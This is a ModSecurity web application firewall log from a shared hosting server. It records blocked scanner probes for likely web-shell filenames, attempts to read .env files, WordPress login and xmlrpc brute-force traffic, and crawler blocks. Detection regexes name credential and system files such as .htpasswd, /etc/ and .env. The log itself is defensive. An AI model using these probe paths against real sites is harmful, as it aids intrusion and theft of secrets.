[Tue May 26 15:00:55.936325 2026] [security2:error] [pid 662057:tid 662269] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoT_T3lMm9tGFVg9RkQgAAAVw"]
[Tue May 26 15:00:56.618304 2026] [security2:error] [pid 662057:tid 662300] [client 4.193.189.92:12524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/about.php"] [unique_id "ahVoUPT3lMm9tGFVg9RkXwAAAXs"]
[Tue May 26 15:00:56.834661 2026] [security2:error] [pid 662057:tid 662246] [client 195.178.110.34:40384] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/apps/.env"] [unique_id "ahVoUPT3lMm9tGFVg9RkYAAAAUU"]
[Tue May 26 15:00:57.460782 2026] [security2:error] [pid 662057:tid 662212] [client 4.193.189.92:10782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/atomlib.php"] [unique_id "ahVoUfT3lMm9tGFVg9RkdwAAASM"]
[Tue May 26 15:00:57.604601 2026] [security2:error] [pid 662057:tid 662244] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoUfT3lMm9tGFVg9RkbAAAAUM"]
[Tue May 26 15:00:58.260477 2026] [security2:error] [pid 662057:tid 662300] [client 4.193.189.92:10265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/alfa-rex.php7"] [unique_id "ahVoUvT3lMm9tGFVg9RkoAAAAXs"]
[Tue May 26 15:00:58.441845 2026] [security2:error] [pid 662057:tid 662190] [client 24.205.185.74:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoUvT3lMm9tGFVg9RkmAAAAQ0"]
[Tue May 26 15:00:58.635943 2026] [security2:error] [pid 662057:tid 662262] [client 136.243.220.209:40817] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoUvT3lMm9tGFVg9RktQAAAVU"]
[Tue May 26 15:00:59.051630 2026] [security2:error] [pid 662057:tid 662256] [client 4.193.189.92:10292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/b.php"] [unique_id "ahVoU_T3lMm9tGFVg9RkywAAAU8"]
[Tue May 26 15:00:59.794921 2026] [security2:error] [pid 662057:tid 662234] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoU_T3lMm9tGFVg9Rk4wAAATk"]
[Tue May 26 15:00:59.799856 2026] [security2:error] [pid 662057:tid 662259] [client 4.193.189.92:8593] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/buy.php"] [unique_id "ahVoU_T3lMm9tGFVg9Rk9wAAAVI"]
[Tue May 26 15:01:00.593213 2026] [security2:error] [pid 662057:tid 662294] [client 4.193.189.92:12348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/bless.php"] [unique_id "ahVoVPT3lMm9tGFVg9RlHAAAAXU"]
[Tue May 26 15:01:01.313153 2026] [security2:error] [pid 662057:tid 662283] [client 4.193.189.92:12152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/class-t.api.php"] [unique_id "ahVoVfT3lMm9tGFVg9RlMQAAAWo"]
[Tue May 26 15:01:02.090808 2026] [security2:error] [pid 662057:tid 662261] [client 4.193.189.92:5732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/cache.php"] [unique_id "ahVoVvT3lMm9tGFVg9RlRwAAAVQ"]
[Tue May 26 15:01:02.631915 2026] [security2:error] [pid 662057:tid 662226] [client 154.161.32.97:57089] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoVvT3lMm9tGFVg9RlVAAAATE"]
[Tue May 26 15:01:02.632019 2026] [security2:error] [pid 662057:tid 662226] [client 154.161.32.97:57089] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoVvT3lMm9tGFVg9RlVAAAATE"]
[Tue May 26 15:01:02.685306 2026] [security2:error] [pid 662057:tid 662256] [client 136.243.220.209:33918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoVvT3lMm9tGFVg9RlWQAAAU8"]
[Tue May 26 15:01:02.860103 2026] [security2:error] [pid 662057:tid 662228] [client 4.193.189.92:6433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/content.php"] [unique_id "ahVoVvT3lMm9tGFVg9RlYAAAATM"]
[Tue May 26 15:01:03.074999 2026] [security2:error] [pid 662057:tid 662196] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoVvT3lMm9tGFVg9RlWAAAARM"]
[Tue May 26 15:01:03.609407 2026] [security2:error] [pid 662057:tid 662234] [client 4.193.189.92:6483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/classwithtostring.php"] [unique_id "ahVoV_T3lMm9tGFVg9RlawAAATk"]
[Tue May 26 15:01:03.891780 2026] [security2:error] [pid 662057:tid 662259] [client 74.249.173.207:27854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.ktmadvance-senegal.com"] [uri "/wk/index.php"] [unique_id "ahVoV_T3lMm9tGFVg9RlcgAAAVI"]
[Tue May 26 15:01:04.287643 2026] [security2:error] [pid 662057:tid 662310] [client 195.178.110.34:59154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/application/.env"] [unique_id "ahVoWPT3lMm9tGFVg9RlgwAAAYU"]
[Tue May 26 15:01:04.351038 2026] [security2:error] [pid 662057:tid 662237] [client 4.193.189.92:9205] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/css.php"] [unique_id "ahVoWPT3lMm9tGFVg9RlhgAAATw"]
[Tue May 26 15:01:04.587605 2026] [security2:error] [pid 662057:tid 662304] [client 62.60.130.239:54518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 239.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVoWPT3lMm9tGFVg9RliAAAAX8"], referer: https://duckduckgo.com/
[Tue May 26 15:01:04.920555 2026] [security2:error] [pid 662057:tid 662287] [client 62.60.130.239:54648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 239.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVoWPT3lMm9tGFVg9RllAAAAW4"]
[Tue May 26 15:01:04.925757 2026] [security2:error] [pid 662057:tid 662200] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoWPT3lMm9tGFVg9RljgAAARc"]
[Tue May 26 15:01:05.065109 2026] [security2:error] [pid 662057:tid 662313] [client 4.193.189.92:6484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/chosen.php"] [unique_id "ahVoWfT3lMm9tGFVg9RllQAAAYg"]
[Tue May 26 15:01:05.824550 2026] [security2:error] [pid 662057:tid 662189] [client 4.193.189.92:9196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/doc.php"] [unique_id "ahVoWfT3lMm9tGFVg9RlowAAAQw"]
[Tue May 26 15:01:06.750719 2026] [security2:error] [pid 662057:tid 662222] [client 4.193.189.92:5067] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/elp.php"] [unique_id "ahVoWvT3lMm9tGFVg9RlsQAAAS0"]
[Tue May 26 15:01:06.829993 2026] [security2:error] [pid 662057:tid 662260] [client 74.249.173.207:27844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.ktmadvance-senegal.com"] [uri "/inputs.php"] [unique_id "ahVoWvT3lMm9tGFVg9RluQAAAVM"]
[Tue May 26 15:01:07.015895 2026] [security2:error] [pid 662057:tid 662226] [client 136.243.220.209:12280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoW_T3lMm9tGFVg9RlvQAAATE"]
[Tue May 26 15:01:07.213197 2026] [security2:error] [pid 662057:tid 662310] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoWvT3lMm9tGFVg9RltQAAAYU"]
[Tue May 26 15:01:07.538408 2026] [security2:error] [pid 662057:tid 662208] [client 4.193.189.92:1287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/Exception-class.php"] [unique_id "ahVoW_T3lMm9tGFVg9RlxQAAAR8"]
[Tue May 26 15:01:08.321013 2026] [security2:error] [pid 662057:tid 662283] [client 4.193.189.92:1476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/ee.php"] [unique_id "ahVoXPT3lMm9tGFVg9Rl3wAAAWo"]
[Tue May 26 15:01:08.428220 2026] [security2:error] [pid 662057:tid 662227] [client 62.60.130.239:54722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 239.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVoXPT3lMm9tGFVg9Rl4AAAATI"]
[Tue May 26 15:01:08.920826 2026] [security2:error] [pid 662057:tid 662242] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoXPT3lMm9tGFVg9Rl5gAAAUE"]
[Tue May 26 15:01:09.103558 2026] [security2:error] [pid 662057:tid 662285] [client 4.193.189.92:8588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/edit.php"] [unique_id "ahVoXfT3lMm9tGFVg9Rl9wAAAWw"]
[Tue May 26 15:01:09.863403 2026] [security2:error] [pid 662057:tid 662210] [client 4.193.189.92:5740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/f35.php"] [unique_id "ahVoXfT3lMm9tGFVg9RmEAAAASE"]
[Tue May 26 15:01:10.498332 2026] [security2:error] [pid 662057:tid 662214] [client 136.243.220.209:15143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoXvT3lMm9tGFVg9RmJAAAASU"]
[Tue May 26 15:01:10.660845 2026] [security2:error] [pid 662057:tid 662258] [client 4.193.189.92:8579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/fff.php"] [unique_id "ahVoXvT3lMm9tGFVg9RmKQAAAVE"]
[Tue May 26 15:01:11.414056 2026] [security2:error] [pid 662057:tid 662279] [client 4.193.189.92:5758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/ff1.php"] [unique_id "ahVoX_T3lMm9tGFVg9RmOwAAAWY"]
[Tue May 26 15:01:11.784557 2026] [security2:error] [pid 662057:tid 662300] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoX_T3lMm9tGFVg9RmOgAAAXs"]
[Tue May 26 15:01:11.811494 2026] [security2:error] [pid 662057:tid 662232] [client 45.12.3.126:65388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 126.3.12.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/images/images/cache.php"] [unique_id "ahVoX_T3lMm9tGFVg9RmRQAAATc"]
[Tue May 26 15:01:12.177004 2026] [security2:error] [pid 662057:tid 662192] [client 4.193.189.92:1327] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/flower.php"] [unique_id "ahVoYPT3lMm9tGFVg9RmTAAAAQ8"]
[Tue May 26 15:01:12.575248 2026] [security2:error] [pid 662057:tid 662211] [client 195.178.110.34:59180] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/application/.env"] [unique_id "ahVoYPT3lMm9tGFVg9RmYAAAASI"]
[Tue May 26 15:01:12.625315 2026] [security2:error] [pid 662057:tid 662287] [client 154.161.32.97:57090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoYPT3lMm9tGFVg9RmYQAAAW4"]
[Tue May 26 15:01:12.625432 2026] [security2:error] [pid 662057:tid 662287] [client 154.161.32.97:57090] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoYPT3lMm9tGFVg9RmYQAAAW4"]
[Tue May 26 15:01:12.971439 2026] [security2:error] [pid 662057:tid 662193] [client 4.193.189.92:8577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/file.php"] [unique_id "ahVoYPT3lMm9tGFVg9RmaAAAARA"]
[Tue May 26 15:01:13.775181 2026] [security2:error] [pid 662057:tid 662232] [client 4.193.189.92:12525] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/goods.php"] [unique_id "ahVoYfT3lMm9tGFVg9RmhwAAATc"]
[Tue May 26 15:01:13.915972 2026] [security2:error] [pid 662057:tid 662300] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoYfT3lMm9tGFVg9RmfAAAAXs"]
[Tue May 26 15:01:14.565607 2026] [security2:error] [pid 662057:tid 662238] [client 4.193.189.92:10497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/g.php"] [unique_id "ahVoYvT3lMm9tGFVg9RmnAAAAT0"]
[Tue May 26 15:01:14.781111 2026] [security2:error] [pid 662057:tid 662197] [client 136.243.220.209:6079] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoYvT3lMm9tGFVg9RmowAAARQ"]
[Tue May 26 15:01:15.386458 2026] [security2:error] [pid 662057:tid 662263] [client 4.193.189.92:12407] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/hplfuns.php"] [unique_id "ahVoY_T3lMm9tGFVg9RmsQAAAVY"]
[Tue May 26 15:01:15.949945 2026] [security2:error] [pid 662057:tid 662232] [client 51.68.111.242:25383] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "hassina-foundation.com"] [uri "/robots.txt"] [unique_id "ahVoY_T3lMm9tGFVg9RmxAAAATc"]
[Tue May 26 15:01:15.950058 2026] [security2:error] [pid 662057:tid 662232] [client 51.68.111.242:25383] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "hassina-foundation.com"] [uri "/robots.txt"] [unique_id "ahVoY_T3lMm9tGFVg9RmxAAAATc"]
[Tue May 26 15:01:16.217539 2026] [security2:error] [pid 662057:tid 662212] [client 4.193.189.92:1511] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/ioxi-o.php"] [unique_id "ahVoZPT3lMm9tGFVg9RmygAAASM"]
[Tue May 26 15:01:16.255949 2026] [security2:error] [pid 662057:tid 662191] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoY_T3lMm9tGFVg9RmwAAAAQ4"]
[Tue May 26 15:01:17.013382 2026] [security2:error] [pid 662057:tid 662189] [client 4.193.189.92:4897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/in.php"] [unique_id "ahVoZfT3lMm9tGFVg9Rm6wAAAQw"]
[Tue May 26 15:01:17.383672 2026] [security2:error] [pid 662057:tid 662242] [client 180.102.110.141:46748] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/"] [unique_id "ahVoZfT3lMm9tGFVg9Rm8wAAAUE"]
